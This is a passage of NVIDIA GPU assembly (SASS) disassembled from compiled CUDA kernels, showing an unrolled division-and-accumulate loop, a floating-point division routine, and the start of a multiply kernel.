/*0268*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0270*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0278*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0288*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0290*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0298*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*02a8*/ CAL 0x810 ; /* 0xe260000056000040 */
/*02b0*/ IADD32I R5, R0, 0x5 ; /* 0x1c00000000570005 */
/*02b8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*02c8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*02d0*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*02d8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*02e8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*02f0*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*02f8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0308*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0310*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0318*/ CAL 0x810 ; /* 0xe26000004f000040 */
/* 0x001fd440fe2007f6 */
/*0328*/ IADD32I R5, R0, 0x6 ; /* 0x1c00000000670005 */
/*0330*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0338*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0348*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0350*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0358*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0368*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0370*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0378*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0388*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0390*/ CAL 0x810 ; /* 0xe260000047800040 */
/*0398*/ IADD32I R5, R0, 0x7 ; /* 0x1c00000000770005 */
/* 0x081fd800fea207f1 */
/*03a8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*03b0*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*03b8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*03c8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*03d0*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*03d8*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*03e8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*03f0*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*03f8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0408*/ CAL 0x810 ; /* 0xe260000040000040 */
/*0410*/ IADD32I R5, R0, 0x8 ; /* 0x1c00000000870005 */
/*0418*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0428*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0430*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0438*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0448*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0450*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0458*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0468*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0470*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0478*/ CAL 0x810 ; /* 0xe260000039000040 */
/* 0x001fd440fe2007f6 */
/*0488*/ IADD32I R5, R0, 0x9 ; /* 0x1c00000000970005 */
/*0490*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0498*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*04a8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*04b0*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*04b8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*04c8*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*04d0*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*04d8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*04e8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*04f0*/ CAL 0x810 ; /* 0xe260000031800040 */
/*04f8*/ IADD32I R5, R0, 0xa ; /* 0x1c00000000a70005 */
/* 0x081fd800fea207f1 */
/*0508*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0510*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0518*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0528*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0530*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0538*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0548*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0550*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0558*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0568*/ CAL 0x810 ; /* 0xe26000002a000040 */
/*0570*/ IADD32I R5, R0, 0xb ; /* 0x1c00000000b70005 */
/*0578*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0588*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0590*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0598*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*05a8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*05b0*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*05b8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*05c8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*05d0*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*05d8*/ CAL 0x810 ; /* 0xe260000023000040 */
/* 0x001fd440fe2007f6 */
/*05e8*/ IADD32I R5, R0, 0xc ; /* 0x1c00000000c70005 */
/*05f0*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*05f8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0608*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0610*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0618*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0628*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0630*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0638*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0648*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0650*/ CAL 0x810 ; /* 0xe26000001b800040 */
/*0658*/ IADD32I R5, R0, 0xd ; /* 0x1c00000000d70005 */
/* 0x081fd800fea207f1 */
/*0668*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0670*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0678*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0688*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0690*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0698*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*06a8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*06b0*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*06b8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*06c8*/ CAL 0x810 ; /* 0xe260000014000040 */
/*06d0*/ IADD32I R5, R0, 0xe ; /* 0x1c00000000e70005 */
/*06d8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*06e8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*06f0*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*06f8*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0708*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0710*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0718*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*0728*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0730*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0738*/ CAL 0x810 ; /* 0xe26000000d000040 */
/* 0x001fd440fe2007f6 */
/*0748*/ IADD32I R5, R0, 0xf ; /* 0x1c00000000f70005 */
/*0750*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0758*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*0768*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0770*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0778*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0788*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0790*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0798*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fc421ffa000b6 */
/*07a8*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*07b0*/ CAL 0x810 ; /* 0xe260000005800040 */
/*07b8*/ FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x081fc400ffa007f0 */
/*07c8*/ { IADD32I R0, R0, 0x10 ; /* 0x1c00000001070000 */
/*07d0*/ @P1 BRA 0x60 }
/* 0xe2400fff8881000f */
/*07d8*/ SHR R0, R3.reuse, 0x1e ; /* 0x3829000001e70300 */
/* 0x001fd400fc4007e6 */
/*07e8*/ ISCADD R4.CC, R3, c[0x0][0x150], 0x2 ; /* 0x4c18810005470304 */
/*07f0*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/*07f8*/ STG.E [R4], R6 ; /* 0xeedc200000070406 */
/* 0x001ff400fda007ff */
/*0808*/ EXIT ; /* 0xe30000000007000f */
/*0810*/ FCHK.DIVIDE P0, R12, R5 ; /* 0x5c88000000570c00 */
/*0818*/ @P0 BRA 0x890 ; /* 0xe24000000700000f */
/* 0x083fd800e3a007f0 */
/*0828*/ { FADD.FTZ R7, -R5, -RZ ; /* 0x5c5930000ff70507 */
/*0830*/ MUFU.RCP R4, R5 }
/* 0x5080000000470504 */
/*0838*/ FFMA R9, R4.reuse, R7, c[0x2][0x0] ; /* 0x5180038800070409 */
/* 0x281fd800fec007f6 */
/*0848*/ FFMA R4, R4, R9, R4 ; /* 0x5980020000970404 */
/*0850*/ FFMA R9, R12, R4, RZ ; /* 0x59807f8000470c09 */
/*0858*/ FFMA R10, R7.reuse, R9, R12.reuse ; /* 0x598006000097070a */
/* 0x001fc000fcc007f6 */
/*0868*/ FFMA R10, R4, R10, R9 ; /* 0x5980048000a7040a */
/*0870*/ FFMA R7, R7, R10, R12 ; /* 0x5980060000a70707 */
/*0878*/ { FFMA R4, R4, R7, R10 ; /* 0x5980050000770404 */
/* 0x001fd800fe2007ff */
/*0888*/ RET }
/* 0xe32000000007000f */
/*0890*/ MOV R9, R12 ; /* 0x5c98078000c70009 */
/*0898*/ MOV R8, R5 ; /* 0x5c98078000570008 */
/* 0x001fc000ffe007fd */
/*08a8*/ CAL 0x8b8 ; /* 0xe260000000800040 */
/*08b0*/ RET ; /* 0xe32000000007000f */
/*08b8*/ { BFE.U32 R5, R8, 0x817 ; /* 0x3800000081770805 */
/* 0x001fd400fe2007f6 */
/*08c8*/ SSY 0xa20 }
/* 0xe290000015000000 */
/*08d0*/ IADD32I R12, R5, -0x1 ; /* 0x1c0ffffffff7050c */
/*08d8*/ BFE.U32 R7, R9, 0x817 ; /* 0x3800000081770907 */
/* 0x001fb400fd8007e1 */
/*08e8*/ ISETP.GT.U32.AND P0, PT, R12, 0xfd, PT ; /* 0x366803800fd70c07 */
/*08f0*/ IADD32I R11, R7, -0x1 ; /* 0x1c0ffffffff7070b */
/*08f8*/ ISETP.GT.U32.OR P0, PT, R11, 0xfd, P0 ; /* 0x366820000fd70b07 */
/* 0x001fc400ffa007f0 */
/*0908*/ { @!P0 MOV R4, RZ ; /* 0x5c9807800ff80004 */
/*0910*/ @!P0 SYNC }
/* 0xf0f800000008000f */
/*0918*/ FSET.GTU.FTZ.AND R4, |R9|, +INF , PT ; /* 0x30cc03ff80070904 */
/* 0x001ff400fda007e6 */
/*0928*/ FSET.GTU.FTZ.AND R10, |R8|, +INF , PT ; /* 0x30cc03ff8007080a */
/*0930*/ LOP.OR.NZ P0, RZ, R4, R10 ; /* 0x5c40320000a704ff */
/*0938*/ @P0 BRA 0xcd8 ; /* 0xe24000003980000f */
/* 0x001ff400fda007f6 */
/*0948*/ MOV R10, c[0x2][0x4] ; /* 0x4c9807880017000a */
/*0950*/ LOP3.LUT.NZ P0, RZ, R8, R10, R9, 0xc8 ; /* 0x5be004bc80a708ff */
/*0958*/ @!P0 BRA 0xcc0 ; /* 0xe24000003608000f */
/* 0x001fc000fda007f1 */
/*0968*/ FSET.NEU.FTZ.AND RZ.CC, |R9|, +INF , PT ; /* 0x30cd83ff800709ff */
/*0970*/ FSETP.NEU.FTZ.AND P3, PT, |R8|, +INF , PT ; /* 0x36bd83ff8007089f */
/*0978*/ { FSETP.NEU.FTZ.AND P0, PT, |R9|, +INF , PT ; /* 0x36bd83ff80070987 */
/* 0x001fb400fda007ed */
/*0988*/ @!P3 BRA CC.EQ, 0xcc0 }
/* 0xe2400000330b0002 */
/*0990*/ LOP.AND.NZ P2, RZ, R9, c[0x2][0x4] ; /* 0x4c423008001709ff */
/*0998*/ PSETP.OR.AND P2, PT, !P3, !P2, PT ; /* 0x509003814107b017 */
/* 0x001fb400fda007fd */
/*09a8*/ @P2 BRA 0xcb0 ; /* 0xe24000003002000f */
/*09b0*/ LOP.AND.NZ P2, RZ, R8, c[0x2][0x4] ; /* 0x4c423008001708ff */
/*09b8*/ PSETP.OR.AND P0, PT, !P0, !P2, PT ; /* 0x5090038141078007 */
/* 0x001fb000fe2007fd */
/*09c8*/ @P0 BRA 0xc90 ; /* 0xe24000002c00000f */
/*09d0*/ ISETP.GE.AND P0, PT, R11, RZ, PT ; /* 0x5b6d03800ff70b07 */
/*09d8*/ ISETP.GE.AND P2, PT, R12, RZ, PT ; /* 0x5b6d03800ff70c17 */
/* 0x001f8400fc2007e1 */
/*09e8*/ @P0 MOV R4, RZ ; /* 0x5c9807800ff00004 */
/*09f0*/ @!P0 MOV32I R4, 0xffffffc0 ; /* 0x010ffffffc08f004 */
/*09f8*/ @!P0 FFMA R9, R9, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf80080909 */
/* 0x001ff400fe0007e4 */
/*0a08*/ @!P2 FFMA R8, R8, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf800a0808 */
/*0a10*/ { @!P2 IADD32I R4, R4, 0x40 ; /* 0x1c000000040a0404 */
/*0a18*/ SYNC }
/* 0xf0f800000007000f */
/* 0x001f8800fec007f0 */
/*0a28*/ { ISCADD32I R10, R5, -0x3f800000, 0x17 ; /* 0x16ec08000007050a */
/*0a30*/ PBK 0xc78 }
/* 0xe2a0000024000000 */
/*0a38*/ IADD R12, -R10, R8 ; /* 0x5c12000000870a0c */
/* 0x001ff400fc200714 */
/*0a48*/ MUFU.RCP R10, R12 ; /* 0x5080000000470c0a */
/*0a50*/ FADD.FTZ R8, -R12, -RZ ; /* 0x5c5930000ff70c08 */
/*0a58*/ IADD32I R7, R7, -0x7f ; /* 0x1c0ffffff8170707 */
/* 0x001f9800fca00ff1 */
/*0a68*/ FFMA R13, R10, R8, c[0x2][0x0] ; /* 0x5180040800070a0d */
/*0a70*/ ISCADD R11, -R7, R9, 0x17 ; /* 0x5c1a0b800097070b */
/*0a78*/ FFMA R9, R10, R13, R10 ; /* 0x5980050000d70a09 */
/* 0x001fc400fcc007e6 */
/*0a88*/ FFMA R10, R11, R9, RZ ; /* 0x59807f8000970b0a */
/*0a90*/ FFMA R15, R8, R10, R11 ; /* 0x5980058000a7080f */
/*0a98*/ FFMA R10, R9, R15, R10 ; /* 0x5980050000f7090a */
/* 0x001f9400fc2007e5 */
/*0aa8*/ IADD3 R7, R7, 0x7f, -R5 ; /* 0x38c2028007f70707 */
/*0ab0*/ FFMA R8, R8, R10, R11 ; /* 0x5980058000a70808 */
/*0ab8*/ IADD R7, R7, R4 ; /* 0x5c10000000470707 */
/* 0x001ff400fcc007f6 */
/*0ac8*/ FFMA R5, R9, R8, R10 ; /* 0x5980050000870905 */
/*0ad0*/ BFE.U32 R4, R5, 0x817 ; /* 0x3800000081770504 */
/*0ad8*/ IADD R4, R4, R7 ; /* 0x5c10000000770404 */
/* 0x001ff400fda007f6 */
/*0ae8*/ IADD32I R11, R4, -0x1 ; /* 0x1c0ffffffff7040b */
/*0af0*/ ISETP.GE.U32.AND P0, PT, R11, 0xfe, PT ; /* 0x366c03800fe70b07 */
/*0af8*/ @!P0 BRA 0xc60 ; /* 0xe24000001608000f */
/* 0x001ff400fda007f0 */
/*0b08*/ { ISETP.GT.AND P0, PT, R4, 0xfe, PT ; /* 0x366903800fe70407 */
/*0b10*/ SSY 0xb60 }
/* 0xe290000004800000 */
/*0b18*/ @P0 BRA 0xc40 ; /* 0xe24000001200000f */
/* 0x001fb400ffa007ed */
/*0b28*/ ISETP.GE.AND P0, PT, R4, 0x1, PT ; /* 0x366d038000170407 */
/*0b30*/ @P0 BRK ; /* 0xe34000000000000f */
/*0b38*/ ISETP.GE.AND P0, PT, R4, -0x18, PT ; /* 0x376d03fffe870407 */
/* 0x001ff400ffa007f0 */
/*0b48*/ { LOP32I.AND R5, R5, 0x80000000 ; /* 0x0408000000070505 */
/*0b50*/ @!P0 BRK }
/* 0xe34000000008000f */
/*0b58*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001f8400fca007f1 */
/*0b68*/ FFMA.RZ R7, R9, R8, R10 ; /* 0x5998050000870907 */
/*0b70*/ ISETP.NE.AND P2, PT, R4, RZ, PT ; /* 0x5b6b03800ff70417 */
/*0b78*/ LOP32I.AND R7, R7, 0x7fffff ; /* 0x040007fffff70707 */
/* 0x001f8400fc2007e5 */
/*0b88*/ IADD32I R12, R4, 0x20 ; /* 0x1c0000000207040c */
/*0b90*/ LOP32I.OR R11, R7, 0x800000 ; /* 0x042008000007070b */
/*0b98*/ FFMA.RP R7, R9, R8, R10 ; /* 0x5990050000870907 */
/* 0x001fd000fe4007f4 */
/*0ba8*/ FFMA.RM R8, R9, R8, R10 ; /* 0x5988050000870908 */
/*0bb0*/ SHL R12, R11, R12 ; /* 0x5c48000000c70b0c */
/*0bb8*/ FSETP.NEU.FTZ.AND P0, PT, R7, R8, PT ; /* 0x5bbd838000870707 */
/* 0x001f9800fec007e1 */
/*0bc8*/ ISETP.NE.AND P2, PT, R12, RZ, P2 ; /* 0x5b6b01000ff70c17 */
/*0bd0*/ IADD R7, -R4, RZ ; /* 0x5c1200000ff70407 */
/*0bd8*/ ICMP.NE R4, R7, RZ, R4 ; /* 0x5b4b02000ff70704 */
/* 0x001fd800fec007f1 */
/*0be8*/ PSETP.OR.AND P0, PT, P0, P2, PT ; /* 0x5090038041070007 */
/*0bf0*/ SHR.U32 R4, R11, R4 ; /* 0x5c28000000470b04 */
/*0bf8*/ SHR.U32 R8, R4, 0x1 ; /* 0x3828000000170408 */
/* 0x001f9800fcc007fd */
/*0c08*/ SEL R7, RZ, 0x1, !P0 ; /* 0x38a004000017ff07 */
/*0c10*/ LOP3.LUT R7, R7, 0x1, R8, 0xf8 ; /* 0x3cf8040000170707 */
/*0c18*/ LOP.AND R7, R7, R4 ; /* 0x5c47000000470707 */
/* 0x001ff400fe0007e6 */
/*0c28*/ IADD R7, R8, R7 ; /* 0x5c10000000770807 */
/*0c30*/ { LOP.OR R5, R7, R5 ; /* 0x5c47020000570705 */
/*0c38*/ BRK }
/* 0xe34000000007000f */
/* 0x001ff400fe0007f6 */
/*0c48*/ LOP32I.AND R5, R5, 0x80000000 ; /* 0x0408000000070505 */
/*0c50*/ { LOP32I.OR R5, R5, 0x7f800000 ; /* 0x0427f80000070505 */
/*0c58*/ BRK }
/* 0xe34000000007000f */
/* 0x001fc000ffa007f0 */
/*0c68*/ { ISCADD R5, R7, R5, 0x17 ; /* 0x5c180b8000570705 */
/*0c70*/ BRK }
/* 0xe34000000007000f */
/*0c78*/ { MOV R4, R5 ; /* 0x5c98078000570004 */
/* 0x001fc000fec007ff */
/*0c88*/ RET }
/* 0xe32000000007000f */
/*0c90*/ LOP3.LUT R8, R8, c[0x2][0x8], R9, 0x48 ; /* 0x0248048800270808 */
/*0c98*/ { LOP32I.OR R4, R8, 0x7f800000 ; /* 0x0427f80000070804 */
/* 0x001ffc00fe0007ff */
/*0ca8*/ RET }
/* 0xe32000000007000f */
/*0cb0*/ { LOP3.LUT R4, R8, c[0x2][0x8], R9, 0x48 ; /* 0x0248048800270804 */
/*0cb8*/ RET }
/* 0xe32000000007000f */
/* 0x001fc000ffe007f0 */
/*0cc8*/ { MOV32I R4, 0x7fffffff ; /* 0x0107fffffff7f004 */
/*0cd0*/ RET }
/* 0xe32000000007000f */
/*0cd8*/ { FADD.FTZ R4, R9, R8 ; /* 0x5c58100000870904 */
/* 0x001f8000ffe007ff */
/*0ce8*/ RET }
/* 0xe32000000007000f */
/*0cf0*/ BRA 0xcf0 ; /* 0xe2400fffff87000f */
/*0cf8*/ NOP; /* 0x50b0000000070f00 */
..........................
Function : _Z3mulPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R14, RZ ; /* 0x5c9807800ff7000e */
/*0018*/ S2R R10, SR_CTAID.X }
/* 0xf0c800000257000a */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R3, R10.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270a03 */
/*0038*/ XMAD R0, R10.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270a00 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R10, R10.H1, R3.H1, R0 ; /* 0x5b30001800370a0a */
/*0050*/ MOV32I R0, 0xffffff00 ; /* 0x010ffffff007f000 */
/*0058*/ MOV R11, R10 ; /* 0x5c98078000a7000b */
/* 0x001f9000fc2207f1 */
/*0068*/ SHL R4, R11.reuse, 0x2 ; /* 0x3848000000270b04 */
/*0070*/ SHR.U32 R6, R11, 0x1e ; /* 0x3828000001e70b06 */
/*0078*/ IADD32I R5, R11, 0x1 ; /* 0x1c00000000170b05 */
/* 0x001f8800fc8007f2 */
/*0088*/ IADD R2.CC, R4, c[0x0][0x140] ; /* 0x4c10800005070402 */
/*0090*/ SHL R30, R5, 0x2 ; /* 0x384800000027051e */
/*0098*/ IADD.X R3, R6, c[0x0][0x144] ; /* 0x4c10080005170603 */
/* 0x001f94001e2007f0 */
/*00a8*/ { IADD R4.CC, R4, c[0x0][0x148] ; /* 0x4c10800005270404 */
/*00b0*/ LDG.E R17, [R2] }
/* 0xeed4200000070211 */
/*00b8*/ SHR.U32 R7, R5, 0x1e ; /* 0x3828000001e70507 */
/* 0x001ec400fe0007e2 */
/*00c8*/ IADD.X R5, R6, c[0x0][0x14c] ; /* 0x4c10080005370605 */
/*00d0*/ { IADD R28.CC, R30, c[0x0][0x140] ; /* 0x4c10800005071e1c */
/*00d8*/ LDG.E R15, [R4] }
/* 0xeed420000007040f */
/* 0x001fc000fc4007e5 */
/*00e8*/ IADD32I R6, R11, 0x2 ; /* 0x1c00000000270b06 */
/*00f0*/ IADD.X R29, R7, c[0x0][0x144] ; /* 0x4c1008000517071d */
/*00f8*/ { IADD R30.CC, R30, c[0x0][0x148] ; /* 0x4c10800005271e1e */
/* 0x001f9040fe2001f1 */
/*0108*/ LDG.E R13, [R28] }
/* 0xeed4200000071c0d */
/*0110*/ SHL R26, R6.reuse, 0x2 ; /* 0x384800000027061a */
/*0118*/ SHR.U32 R8, R6, 0x1e ; /* 0x3828000001e70608 */
/* 0x001f9400fc2007e1 */
/*0128*/ IADD.X R31, R7, c[0x0][0x14c] ; /* 0x4c1008000537071f */
/*0130*/ IADD R24.CC, R26, c[0x0][0x140] ; /* 0x4c10800005071a18 */
/*0138*/ IADD32I R6, R11, 0x3 ; /* 0x1c00000000370b06 */
/* 0x081fc400fe2007e1 */
/*0148*/ IADD.X R25, R8, c[0x0][0x144] ; /* 0x4c10080005170819 */
/*0150*/ IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*0158*/ SHL R22, R6.reuse, 0x2 ; /* 0x3848000000270616 */
/* 0x001fc400fe0007e4 */
/*0168*/ SHR.U32 R7, R6, 0x1e ; /* 0x3828000001e70607 */
/*0170*/ { IADD.X R27, R8, c[0x0][0x14c] ; /* 0x4c1008000537081b */
/*0178*/ LDG.E R8, [R24] }
/* 0xeed4200000071808 */
/* 0x001f8800fca007e1 */
/*0188*/ IADD R20.CC, R22, c[0x0][0x140] ; /* 0x4c10800005071614 */
/*0190*/ IADD32I R6, R11, 0x4 ; /* 0x1c00000000470b06 */
/*0198*/ IADD.X R21, R7, c[0x0][0x144] ; /* 0x4c10080005170715 */
/* 0x081fc400fe2007f0 */
/*01a8*/ { IADD R22.CC, R22, c[0x0][0x148] ; /* 0x4c10800005271616 */
/*01b0*/ LDG.E R5, [R20] }
/* 0xeed4200000071405 */
/*01b8*/ SHL R9, R6.reuse, 0x2 ; /* 0x3848000000270609 */
/* 0x001fc000f68007f0 */
/*01c8*/ { SHR.U32 R12, R6, 0x1e ; /* 0x3828000001e7060c */
/*01d0*/ LDG.E R6, [R30] }
/* 0xeed4200000071e06 */
/*01d8*/ { IADD.X R23, R7, c[0x0][0x14c] ; /* 0x4c10080005370717 */
/* 0x001ed800fe0002b2 */
/*01e8*/ LDG.E R7, [R26] }
/* 0xeed4200000071a07 */
/*01f0*/ { IADD R18.CC, R9, c[0x0][0x148] ; /* 0x4c10800005270912 */
/*01f8*/ LDG.E R4, [R22] }
/* 0xeed4200000071604 */
/* 0x001fc001fcc007e1 */
/*0208*/ IADD.X R19, R12, c[0x0][0x14c] ; /* 0x4c10080005370c13 */
/*0210*/ IADD R2.CC, R9, c[0x0][0x140] ; /* 0x4c10800005070902 */
/*0218*/ { IADD.X R3, R12, c[0x0][0x144] ; /* 0x4c10080005170c03 */
/* 0x000ed800fe0000f2 */
/*0228*/ LDG.E R12, [R18] }
/* 0xeed420000007120c */
/*0230*/ { IADD32I R16, R11, 0x5 ; /* 0x1c00000000570b10 */
/*0238*/ LDG.E R9, [R2] }
/* 0xeed4200000070209 */
/* 0x001ff404fc2217f1 */
/*0248*/ SHL R28, R16.reuse, 0x2 ; /* 0x384800000027101c */
